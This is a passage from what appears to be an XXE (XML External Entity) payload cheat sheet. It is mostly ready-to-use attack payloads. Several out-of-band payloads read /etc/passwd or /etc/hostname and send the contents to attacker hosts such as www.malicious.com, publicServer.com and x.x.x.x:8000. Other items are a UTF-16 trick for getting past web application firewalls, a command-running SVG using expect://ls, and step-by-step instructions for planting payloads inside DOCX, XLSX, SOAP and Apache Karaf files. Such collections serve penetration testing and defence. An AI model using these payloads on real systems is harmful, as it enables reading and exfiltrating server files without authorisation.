<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="cp">&lt;!DOCTYPE root [&lt;!ENTITY test SYSTEM &#39;http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net&#39;&gt;</span>]&gt;
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="nt">&lt;root&gt;</span><span class="ni">&amp;test;</span><span class="nt">&lt;/root&gt;</span>
</code></pre></div>
<p>Send the content of <code>/etc/passwd</code> to "www.malicious.com", you may receive only the first line.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="cp">&lt;!DOCTYPE foo [</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="cp">&lt;!ELEMENT foo ANY &gt;</span>
<a id="__codelineno-24-4" name="__codelineno-24-4" href="#__codelineno-24-4"></a><span class="cp">&lt;!ENTITY % xxe SYSTEM &quot;file:///etc/passwd&quot; &gt;</span>
<a id="__codelineno-24-5" name="__codelineno-24-5" href="#__codelineno-24-5"></a><span class="cp">&lt;!ENTITY callhome SYSTEM &quot;www.malicious.com/?%xxe;&quot;&gt;</span>
<a id="__codelineno-24-6" name="__codelineno-24-6" href="#__codelineno-24-6"></a>]
<a id="__codelineno-24-7" name="__codelineno-24-7" href="#__codelineno-24-7"></a>&gt;
<a id="__codelineno-24-8" name="__codelineno-24-8" href="#__codelineno-24-8"></a><span class="nt">&lt;foo&gt;</span><span class="ni">&amp;callhome;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div>
<h3 id="xxe-oob-attack-yunusov-2013">XXE OOB Attack (Yunusov, 2013)</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="cp">&lt;!DOCTYPE data SYSTEM &quot;http://publicServer.com/parameterEntity_oob.dtd&quot;&gt;</span>
<a id="__codelineno-25-3" name="__codelineno-25-3" href="#__codelineno-25-3"></a><span class="nt">&lt;data&gt;</span><span class="ni">&amp;send;</span><span class="nt">&lt;/data&gt;</span>
<a id="__codelineno-25-4" name="__codelineno-25-4" href="#__codelineno-25-4"></a>
<a id="__codelineno-25-5" name="__codelineno-25-5" href="#__codelineno-25-5"></a>File<span class="w"> </span>stored<span class="w"> </span>on<span class="w"> </span>http://publicServer.com/parameterEntity_oob.dtd
<a id="__codelineno-25-6" name="__codelineno-25-6" href="#__codelineno-25-6"></a><span class="cp">&lt;!ENTITY % file SYSTEM &quot;file:///sys/power/image_size&quot;&gt;</span>
<a id="__codelineno-25-7" name="__codelineno-25-7" href="#__codelineno-25-7"></a><span class="cp">&lt;!ENTITY % all &quot;&lt;!ENTITY send SYSTEM &#39;http://publicServer.com/?%file;&#39;&gt;</span>&quot;&gt;
<a id="__codelineno-25-8" name="__codelineno-25-8" href="#__codelineno-25-8"></a>%all;
</code></pre></div>
<h3 id="xxe-oob-with-dtd-and-php-filter">XXE OOB with DTD and PHP Filter</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; ?&gt;</span>
<a id="__codelineno-26-2" name="__codelineno-26-2" href="#__codelineno-26-2"></a><span class="cp">&lt;!DOCTYPE r [</span>
<a id="__codelineno-26-3" name="__codelineno-26-3" href="#__codelineno-26-3"></a><span class="cp">&lt;!ELEMENT r ANY &gt;</span>
<a id="__codelineno-26-4" name="__codelineno-26-4" href="#__codelineno-26-4"></a><span class="cp">&lt;!ENTITY % sp SYSTEM &quot;http://127.0.0.1/dtd.xml&quot;&gt;</span>
<a id="__codelineno-26-5" name="__codelineno-26-5" href="#__codelineno-26-5"></a>%sp;
<a id="__codelineno-26-6" name="__codelineno-26-6" href="#__codelineno-26-6"></a>%param1;
<a id="__codelineno-26-7" name="__codelineno-26-7" href="#__codelineno-26-7"></a>]&gt;
<a id="__codelineno-26-8" name="__codelineno-26-8" href="#__codelineno-26-8"></a><span class="nt">&lt;r&gt;</span><span class="ni">&amp;exfil;</span><span class="nt">&lt;/r&gt;</span>
<a id="__codelineno-26-9" name="__codelineno-26-9" href="#__codelineno-26-9"></a>
<a id="__codelineno-26-10" name="__codelineno-26-10" href="#__codelineno-26-10"></a>File<span class="w"> </span>stored<span class="w"> </span>on<span class="w"> </span>http://127.0.0.1/dtd.xml
<a id="__codelineno-26-11" name="__codelineno-26-11" href="#__codelineno-26-11"></a><span class="cp">&lt;!ENTITY % data SYSTEM &quot;php://filter/convert.base64-encode/resource=/etc/passwd&quot;&gt;</span>
<a id="__codelineno-26-12" name="__codelineno-26-12" href="#__codelineno-26-12"></a><span class="cp">&lt;!ENTITY % param1 &quot;&lt;!ENTITY exfil SYSTEM &#39;http://127.0.0.1/dtd.xml?%data;&#39;&gt;</span>&quot;&gt;
</code></pre></div>
<h3 id="xxe-oob-with-apache-karaf">XXE OOB with Apache Karaf</h3>
<p>CVE-2018-11788 affecting versions:</p>
<ul>
<li>Apache Karaf &lt;= 4.2.1</li>
<li>Apache Karaf &lt;= 4.1.6</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span>
<a id="__codelineno-27-2" name="__codelineno-27-2" href="#__codelineno-27-2"></a><span class="cp">&lt;!DOCTYPE doc [&lt;!ENTITY % dtd SYSTEM &quot;http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com&quot;&gt;</span><span class="w"> </span>%dtd;]
<a id="__codelineno-27-3" name="__codelineno-27-3" href="#__codelineno-27-3"></a><span class="nt">&lt;features</span><span class="w"> </span><span class="na">name=</span><span class="s">&quot;my-features&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://karaf.apache.org/xmlns/features/v1.3.0&quot;</span><span class="w"> </span><span class="na">xmlns:xsi=</span><span class="s">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span>
<a id="__codelineno-27-4" name="__codelineno-27-4" href="#__codelineno-27-4"></a><span class="w"> </span><span class="na">xsi:schemaLocation=</span><span class="s">&quot;http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-27-5" name="__codelineno-27-5" href="#__codelineno-27-5"></a><span class="w"> </span><span class="nt">&lt;feature</span><span class="w"> </span><span class="na">name=</span><span class="s">&quot;deployer&quot;</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;2.0&quot;</span><span class="w"> </span><span class="na">install=</span><span class="s">&quot;auto&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-27-6" name="__codelineno-27-6" href="#__codelineno-27-6"></a><span class="w"> </span><span class="nt">&lt;/feature&gt;</span>
<a id="__codelineno-27-7" name="__codelineno-27-7" href="#__codelineno-27-7"></a><span class="nt">&lt;/features&gt;</span>
</code></pre></div>
<p>Send the XML file to the <code>deploy</code> folder.</p>
<p>Ref. <a href="https://github.com/brianwrf/CVE-2018-11788">brianwrf/CVE-2018-11788</a></p>
<h2 id="waf-bypasses">WAF Bypasses</h2>
<h3 id="bypass-via-character-encoding">Bypass via Character Encoding</h3>
<p>XML parsers uses 4 methods to detect encoding:</p>
<ul>
<li>HTTP Content Type: <code>Content-Type: text/xml; charset=utf-8</code></li>
<li>Reading Byte Order Mark (BOM)</li>
<li>Reading first symbols of document <ul>
<li>UTF-8 (3C 3F 78 6D)</li>
<li>UTF-16BE (00 3C 00 3F)</li>
<li>UTF-16LE (3C 00 3F 00)</li>
</ul>
</li>
<li>XML declaration: <code>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</code></li>
</ul>
<table>
<thead>
<tr>
<th>Encoding</th>
<th>BOM</th>
<th>Example</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>UTF-8</td>
<td>EF BB BF</td>
<td>EF BB BF 3C 3F 78 6D 6C</td>
<td>...&lt;?xml</td>
</tr>
<tr>
<td>UTF-16BE</td>
<td>FE FF</td>
<td>FE FF 00 3C 00 3F 00 78 00 6D 00 6C</td>
<td>...&lt;.?.x.m.l</td>
</tr>
<tr>
<td>UTF-16LE</td>
<td>FF FE</td>
<td>FF FE 3C 00 3F 00 78 00 6D 00 6C 00</td>
<td>..&lt;.?.x.m.l.</td>
</tr>
</tbody>
</table>
<p><strong>Example</strong>: We can convert the payload to <code>UTF-16</code> using <a href="https://man7.org/linux/man-pages/man1/iconv.1.html">iconv</a> to bypass some WAF:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a>cat<span class="w"> </span>utf8exploit.xml<span class="w"> </span><span class="p">|</span><span class="w"> </span>iconv<span class="w"> </span>-f<span class="w"> </span>UTF-8<span class="w"> </span>-t<span class="w"> </span>UTF-16BE<span class="w"> </span>&gt;<span class="w"> </span>utf16exploit.xml
</code></pre></div>
<h3 id="xxe-on-json-endpoints">XXE on JSON Endpoints</h3>
<p>In the HTTP request try to switch the <code>Content-Type</code> from <strong>JSON</strong> to <strong>XML</strong>, </p>
<table>
<thead>
<tr>
<th>Content Type</th>
<th>Data</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>application/json</code></td>
<td><code>{"search":"name","value":"test"}</code></td>
</tr>
<tr>
<td><code>application/xml</code></td>
<td><code>&lt;?xml version="1.0" encoding="UTF-8" ?&gt;&lt;root&gt;&lt;search&gt;name&lt;/search&gt;&lt;value&gt;data&lt;/value&gt;&lt;/root&gt;</code></td>
</tr>
</tbody>
</table>
<ul>
<li>XML documents must contain one root (<code>&lt;root&gt;</code>) element that is the parent of all other elements.</li>
<li>The data must be converted to XML too, otherwise the server will respond with an error. </li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="p">{</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="w"> </span><span class="nt">&quot;errors&quot;</span><span class="p">:{</span>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a><span class="w"> </span><span class="nt">&quot;errorMessage&quot;</span><span class="p">:</span><span class="s2">&quot;org.xml.sax.SAXParseException: XML document structures must start and end within the same entity.&quot;</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="w"> </span><span class="p">}</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a><span class="p">}</span>
</code></pre></div>
<ul>
<li><a href="https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4">NetSPI/Content-Type Converter</a></li>
</ul>
<h2 id="xxe-in-exotic-files">XXE in Exotic Files</h2>
<h3 id="xxe-inside-svg">XXE Inside SVG</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;300&quot;</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.1&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="w"> </span><span class="nt">&lt;image</span><span class="w"> </span><span class="na">xlink:href=</span><span class="s">&quot;expect://ls&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="nt">&gt;&lt;/image&gt;</span>
<a id="__codelineno-30-3" name="__codelineno-30-3" href="#__codelineno-30-3"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p><strong>Classic</strong></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;</span>
<a id="__codelineno-31-2" name="__codelineno-31-2" href="#__codelineno-31-2"></a><span class="cp">&lt;!DOCTYPE test [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/hostname&quot; &gt;</span><span class="w"> </span>]&gt;
<a id="__codelineno-31-3" name="__codelineno-31-3" href="#__codelineno-31-3"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;128px&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;128px&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.1&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-31-4" name="__codelineno-31-4" href="#__codelineno-31-4"></a><span class="w"> </span><span class="nt">&lt;text</span><span class="w"> </span><span class="na">font-size=</span><span class="s">&quot;16&quot;</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;0&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;16&quot;</span><span class="nt">&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/text&gt;</span>
<a id="__codelineno-31-5" name="__codelineno-31-5" href="#__codelineno-31-5"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p><strong>OOB via SVG rasterization</strong></p>
<p><em>xxe.svg</em></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;</span>
<a id="__codelineno-32-2" name="__codelineno-32-2" href="#__codelineno-32-2"></a><span class="cp">&lt;!DOCTYPE svg [</span>
<a id="__codelineno-32-3" name="__codelineno-32-3" href="#__codelineno-32-3"></a><span class="cp">&lt;!ELEMENT svg ANY &gt;</span>
<a id="__codelineno-32-4" name="__codelineno-32-4" href="#__codelineno-32-4"></a><span class="cp">&lt;!ENTITY % sp SYSTEM &quot;http://example.org:8080/xxe.xml&quot;&gt;</span>
<a id="__codelineno-32-5" name="__codelineno-32-5" href="#__codelineno-32-5"></a>%sp;
<a id="__codelineno-32-6" name="__codelineno-32-6" href="#__codelineno-32-6"></a>%param1;
<a id="__codelineno-32-7" name="__codelineno-32-7" href="#__codelineno-32-7"></a>]&gt;
<a id="__codelineno-32-8" name="__codelineno-32-8" href="#__codelineno-32-8"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">viewBox=</span><span class="s">&quot;0 0 200 200&quot;</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.2&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill:red&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-32-9" name="__codelineno-32-9" href="#__codelineno-32-9"></a><span class="w"> </span><span class="nt">&lt;text</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;15&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill:black&quot;</span><span class="nt">&gt;</span>XXE<span class="w"> </span>via<span class="w"> </span>SVG<span class="w"> </span>rasterization<span class="nt">&lt;/text&gt;</span>
<a id="__codelineno-32-10" name="__codelineno-32-10" href="#__codelineno-32-10"></a><span class="w"> </span><span class="nt">&lt;rect</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;0&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;0&quot;</span><span class="w"> </span><span class="na">rx=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">ry=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill:pink;opacity:0.7&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-32-11" name="__codelineno-32-11" href="#__codelineno-32-11"></a><span class="w"> </span><span class="nt">&lt;flowRoot</span><span class="w"> </span><span class="na">font-size=</span><span class="s">&quot;15&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-32-12" name="__codelineno-32-12" href="#__codelineno-32-12"></a><span class="w"> </span><span class="nt">&lt;flowRegion&gt;</span>
<a id="__codelineno-32-13" name="__codelineno-32-13" href="#__codelineno-32-13"></a><span class="w"> </span><span class="nt">&lt;rect</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;0&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;0&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill:red;opacity:0.3&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-32-14" name="__codelineno-32-14" href="#__codelineno-32-14"></a><span class="w"> </span><span class="nt">&lt;/flowRegion&gt;</span>
<a id="__codelineno-32-15" name="__codelineno-32-15" href="#__codelineno-32-15"></a><span class="w"> </span><span class="nt">&lt;flowDiv&gt;</span>
<a id="__codelineno-32-16" name="__codelineno-32-16" href="#__codelineno-32-16"></a><span class="w"> </span><span class="nt">&lt;flowPara&gt;</span><span class="ni">&amp;exfil;</span><span class="nt">&lt;/flowPara&gt;</span>
<a id="__codelineno-32-17" name="__codelineno-32-17" href="#__codelineno-32-17"></a><span class="w"> </span><span class="nt">&lt;/flowDiv&gt;</span>
<a id="__codelineno-32-18" name="__codelineno-32-18" href="#__codelineno-32-18"></a><span class="w"> </span><span class="nt">&lt;/flowRoot&gt;</span>
<a id="__codelineno-32-19" name="__codelineno-32-19" href="#__codelineno-32-19"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p><em>xxe.xml</em></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="cp">&lt;!ENTITY % data SYSTEM &quot;php://filter/convert.base64-encode/resource=/etc/hostname&quot;&gt;</span>
<a id="__codelineno-33-2" name="__codelineno-33-2" href="#__codelineno-33-2"></a><span class="cp">&lt;!ENTITY % param1 &quot;&lt;!ENTITY exfil SYSTEM &#39;ftp://example.org:2121/%data;&#39;&gt;</span>&quot;&gt;
</code></pre></div>
<h3 id="xxe-inside-soap">XXE Inside SOAP</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="nt">&lt;soap:Body&gt;</span>
<a id="__codelineno-34-2" name="__codelineno-34-2" href="#__codelineno-34-2"></a><span class="w"> </span><span class="nt">&lt;foo&gt;</span>
<a id="__codelineno-34-3" name="__codelineno-34-3" href="#__codelineno-34-3"></a><span class="w"> </span><span class="cp">&lt;![CDATA[&lt;!DOCTYPE doc [&lt;!ENTITY % dtd SYSTEM &quot;http://x.x.x.x:22/&quot;&gt; %dtd;]&gt;&lt;xxx/&gt;]]&gt;</span>
<a id="__codelineno-34-4" name="__codelineno-34-4" href="#__codelineno-34-4"></a><span class="w"> </span><span class="nt">&lt;/foo&gt;</span>
<a id="__codelineno-34-5" name="__codelineno-34-5" href="#__codelineno-34-5"></a><span class="nt">&lt;/soap:Body&gt;</span>
</code></pre></div>
<h3 id="xxe-inside-docx-file">XXE Inside DOCX file</h3>
<p>Format of an Open XML file (inject the payload in any .xml file):</p>
<ul>
<li>/_rels/.rels</li>
<li>[Content_Types].xml</li>
<li>Default Main Document Part</li>
<li>/word/document.xml</li>
<li>/ppt/presentation.xml</li>
<li>/xl/workbook.xml</li>
</ul>
<p>Then update the file <code>zip -u xxe.docx [Content_Types].xml</code></p>
<p>Tool : https://github.com/BuffaloWill/oxml_xxe</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a>DOCX/XLSX/PPTX
<a id="__codelineno-35-2" name="__codelineno-35-2" href="#__codelineno-35-2"></a>ODT/ODG/ODP/ODS
<a id="__codelineno-35-3" name="__codelineno-35-3" href="#__codelineno-35-3"></a>SVG
<a id="__codelineno-35-4" name="__codelineno-35-4" href="#__codelineno-35-4"></a>XML
<a id="__codelineno-35-5" name="__codelineno-35-5" href="#__codelineno-35-5"></a>PDF<span class="w"> </span>(experimental)
<a id="__codelineno-35-6" name="__codelineno-35-6" href="#__codelineno-35-6"></a>JPG<span class="w"> </span>(experimental)
<a id="__codelineno-35-7" name="__codelineno-35-7" href="#__codelineno-35-7"></a>GIF<span class="w"> </span>(experimental)
</code></pre></div>
<h3 id="xxe-inside-xlsx-file">XXE Inside XLSX file</h3>
<p>Structure of the XLSX:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="p">$</span> <span class="n">7z</span> <span class="n">l</span> <span class="n">xxe</span><span class="p">.</span><span class="n">xlsx</span>
<a id="__codelineno-36-2" name="__codelineno-36-2" href="#__codelineno-36-2"></a><span class="p">[...]</span>
<a id="__codelineno-36-3" name="__codelineno-36-3" href="#__codelineno-36-3"></a> <span class="n">Date</span> <span class="n">Time</span> <span class="n">Attr</span> <span class="n">Size</span> <span class="n">Compressed</span> <span class="n">Name</span>
<a id="__codelineno-36-4" name="__codelineno-36-4" href="#__codelineno-36-4"></a><span class="p">-------------------</span> <span class="p">-----</span> <span class="p">------------</span> <span class="p">------------</span> <span class="p">------------------------</span>
<a id="__codelineno-36-5" name="__codelineno-36-5" href="#__codelineno-36-5"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">578</span> <span class="n">223</span> <span class="n">_rels</span><span class="p">/.</span><span class="n">rels</span>
<a id="__codelineno-36-6" name="__codelineno-36-6" href="#__codelineno-36-6"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">887</span> <span class="n">508</span> <span class="n">xl</span><span class="p">/</span><span class="n">workbook</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-7" name="__codelineno-36-7" href="#__codelineno-36-7"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">4451</span> <span class="n">643</span> <span class="n">xl</span><span class="p">/</span><span class="n">styles</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-8" name="__codelineno-36-8" href="#__codelineno-36-8"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">2042</span> <span class="n">899</span> <span class="n">xl</span><span class="p">/</span><span class="n">worksheets</span><span class="p">/</span><span class="n">sheet1</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-9" name="__codelineno-36-9" href="#__codelineno-36-9"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">549</span> <span class="n">210</span> <span class="n">xl</span><span class="p">/</span><span class="n">_rels</span><span class="p">/</span><span class="n">workbook</span><span class="p">.</span><span class="n">xml</span><span class="p">.</span><span class="n">rels</span>
<a id="__codelineno-36-10" name="__codelineno-36-10" href="#__codelineno-36-10"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">201</span> <span class="n">160</span> <span class="n">xl</span><span class="p">/</span><span class="n">sharedStrings</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-11" name="__codelineno-36-11" href="#__codelineno-36-11"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">731</span> <span class="n">352</span> <span class="n">docProps</span><span class="p">/</span><span class="n">core</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-12" name="__codelineno-36-12" href="#__codelineno-36-12"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">410</span> <span class="n">246</span> <span class="n">docProps</span><span class="p">/</span><span class="n">app</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-13" name="__codelineno-36-13" href="#__codelineno-36-13"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="p">.....</span> <span class="n">1367</span> <span class="n">345</span> <span class="no">[Content_Types]</span><span class="p">.</span><span class="n">xml</span>
<a id="__codelineno-36-14" name="__codelineno-36-14" href="#__codelineno-36-14"></a><span class="p">-------------------</span> <span class="p">-----</span> <span class="p">------------</span> <span class="p">------------</span> <span class="p">------------------------</span>
<a id="__codelineno-36-15" name="__codelineno-36-15" href="#__codelineno-36-15"></a><span class="n">2021</span><span class="p">-</span><span class="n">10</span><span class="p">-</span><span class="n">17</span> <span class="n">15</span><span class="p">:</span><span class="n">19</span><span class="p">:</span><span class="n">00</span> <span class="n">11216</span> <span class="n">3586</span> <span class="n">9</span> <span class="n">files</span>
</code></pre></div>
<p>Extract Excel file: <code>7z x -oXXE xxe.xlsx</code></p>
<p>Rebuild Excel file:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a>$ cd XXE
<a id="__codelineno-37-2" name="__codelineno-37-2" href="#__codelineno-37-2"></a>$ zip -u ../xxe.xlsx *
</code></pre></div>
<p>Warning: Use <code>zip -u</code> (https://infozip.sourceforge.net/Zip.html) and not <code>7z u</code> / <code>7za u</code> (https://p7zip.sourceforge.net/) or <code>7zz</code> (https://www.7-zip.org/) because they won't recompress it the same way and many Excel parsing libraries will fail to recognize it as a valid Excel file. A valid magic byte signature with (<code>file XXE.xlsx</code>) will be shown as <code>Microsoft Excel 2007+</code> (with <code>zip -u</code>) and an invalid one will be shown as <code>Microsoft OOXML</code>.</p>
<p>Add your blind XXE payload inside <code>xl/workbook.xml</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?&gt;</span>
<a id="__codelineno-38-2" name="__codelineno-38-2" href="#__codelineno-38-2"></a><span class="cp">&lt;!DOCTYPE cdl [&lt;!ELEMENT cdl ANY &gt;&lt;!ENTITY % asd SYSTEM &quot;http://x.x.x.x:8000/xxe.dtd&quot;&gt;</span>%asd;%c;]&gt;
<a id="__codelineno-38-3" name="__codelineno-38-3" href="#__codelineno-38-3"></a><span class="nt">&lt;cdl&gt;</span><span class="ni">&amp;rrr;</span><span class="nt">&lt;/cdl&gt;</span>
<a id="__codelineno-38-4" name="__codelineno-38-4" href="#__codelineno-38-4"></a><span class="nt">&lt;workbook</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://schemas.openxmlformats.org/spreadsheetml/2006/main&quot;</span><span class="w"> </span><span class="na">xmlns:r=</span><span class="s">&quot;http://schemas.openxmlformats.org/officeDocument/2006/relationships&quot;</span><span class="nt">&gt;</span>
</code></pre></div>
<p>Alternatively, add your payload in <code>xl/sharedStrings.xml</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?&gt;</span>
<a id="__codelineno-39-2" name="__codelineno-39-2" href="#__codelineno-39-2"></a><span class="cp">&lt;!DOCTYPE cdl [&lt;!ELEMENT t ANY &gt;&lt;!ENTITY % asd SYSTEM &quot;http://x.x.x.x:8000/xxe.dtd&quot;&gt;</span>%asd;%c;]&gt;
